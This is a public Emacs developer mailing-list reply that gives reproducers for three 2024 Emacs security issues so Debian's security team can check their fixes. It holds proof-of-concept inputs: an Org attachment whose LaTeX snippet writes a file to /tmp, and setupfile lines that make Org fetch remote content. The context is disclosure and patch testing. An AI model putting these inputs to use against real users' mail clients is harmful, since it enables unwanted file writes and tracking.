From: Max Nikulin <manikulin@gmail.com>
To: Sean Whitton <spwhitton@spwhitton.name>,
Ihor Radchenko <yantar92@posteo.net>
Cc: emacs-devel@gnu.org, team@security.debian.org
Subject: Re: Reproducers for recent Emacs security issues
Date: Sun, 14 Apr 2024 11:41:31 +0700 [thread overview]
Message-ID: <706e1218-7451-4221-830a-ae3db3bf842e@gmail.com> (raw)
In-Reply-To: <875xwk8w5w.fsf@melete.silentflame.com>
On 14/04/2024 10:23, Sean Whitton wrote:
>
> I already have a sample Org file that I can use to test whether
> CVE-2024-30202 is fixed. Would you happen to already have reproducers
> for the other two problems to hand?
LaTeX preview issue
===================
- CVE-2024-30203 In Emacs before 29.3, Gnus treats inline MIME contents
as trusted.
- CVE-2024-30204 In Emacs before 29.3, LaTeX preview is enabled by
default for e-mail attachments.
It requires fixes in Emacs code besides Org mode.
1. Install dvipng.
Alternatively you may install dvisvgm and add to your init file
(setq org-preview-latex-default-process 'dvisvgm)
2. Send a mail message with an attachment having
Content-Type: text/x-org
or
Content-Type: text/org
depending on MUA configuration. By default you may get
application/vnd.lotus-organizer for .org files due to /etc/mime.types
Attachment content:
---- 8< ----
#+startup: latexpreview
LaTeX:
\begin{equation}
\newwrite\testfile\openout\testfile=\jobname.poc
\write\testfile{PoC}
\closeout\testfile
A \to \textrm{/tmp/\jobname.poc}
\end{equation}
*Warning!* Change the math snippet before every test
or remove the cached image.
---- >8 ----
3. Open message.
LaTeX preview never worked in attachment inline preview.
Check that a file is created in /tmp/
ls -l tmp/orgtex*.poc
The issue is not fixed for the scenario when an arbitrary text file is
opened in Emacs directly (e.g. a file downloaded from some web site).
Attempts to download remote content
===================================
CVE-2024-30205 In Emacs before 29.3, Org mode considers contents of
remote files to be trusted. This affects Org Mode before 9.6.23.
Actually there are 2 issues. They may be used to track that users
receive messages, so mail addresses are valid. In addition they allow to
download from a remote site payload for the LaTeX preview or code
execution exploits.
[BUG] Unsolicited download of remote resources.
Fri, 2 Feb 2024 23:57:54 +0700.
https://list.orgmode.org/upj6uk$b7o$1@ciao.gmane.io
--- 8< ---
#+setupfile: http://localhost:8000/setup-1234567890.org
--- >8 ---
[BUG] Org may fetch remote content without asking user consent.
Wed, 7 Feb 2024 17:54:07 +0700.
https://list.orgmode.org/upvngj$150v$1@ciao.gmane.io
Requires installed the gvfs-backends package
--- 8< ---
#+setupfile: /dav:localhost#8000:/msg-123456.org
--- >8 ---
Notice that the following commit is not mentioned in the CVE description.
https://git.savannah.gnu.org/cgit/emacs.git/commit/?id=e56f0ef51bf
2024-02-02 20:59:41 +0100 Ihor Radchenko: org: Fix security prompt for
downloading remote resource
Backporting fixes to Emacs-28 requires more changes since the dialog to
ask user if a file should be downloaded has been implemented in Org-9.6
while Emacs-28 is shipped with Org-9.5.
Trying to reproduce, you may face the following issue:
[BUG] Partially broken Org mode when remote setupfile is unavailable.
Tue, 19 Mar 2024 17:46:46 +0700.
https://list.orgmode.org/utbqeo$bk3$1@ciao.gmane.io
next prev parent reply other threads:[~2024-04-14 4:41 UTC|newest]
Thread overview: 15+ messages / expand[flat|nested] mbox.gz Atom feed top
2024-04-14 3:23 Reproducers for recent Emacs security issues Sean Whitton
2024-04-14 4:41 ` Max Nikulin [this message]
2024-04-15 9:27 ` Sean Whitton
2024-04-15 9:32 ` Ihor Radchenko
2024-04-15 9:46 ` Sean Whitton
2024-04-15 10:09 ` Ihor Radchenko
2024-04-15 11:20 ` Max Nikulin
2024-04-15 12:00 ` Ihor Radchenko
2024-04-15 13:42 ` Andrew Cohen
2024-04-15 18:33 ` Florian Weimer
2024-04-15 23:30 ` Andrew Cohen
2024-04-16 4:35 ` Max Nikulin
2024-04-16 12:25 ` Eli Zaretskii
2024-04-16 13:23 ` Andrew Cohen
2024-04-17 14:31 ` Max Nikulin
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
List information: https://www.gnu.org/software/emacs/
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=706e1218-7451-4221-830a-ae3db3bf842e@gmail.com \
--to=manikulin@gmail.com \
--cc=emacs-devel@gnu.org \
--cc=spwhitton@spwhitton.name \
--cc=team@security.debian.org \
--cc=yantar92@posteo.net \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
Code repositories for project(s) associated with this public inbox
https://git.savannah.gnu.org/cgit/emacs.git
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).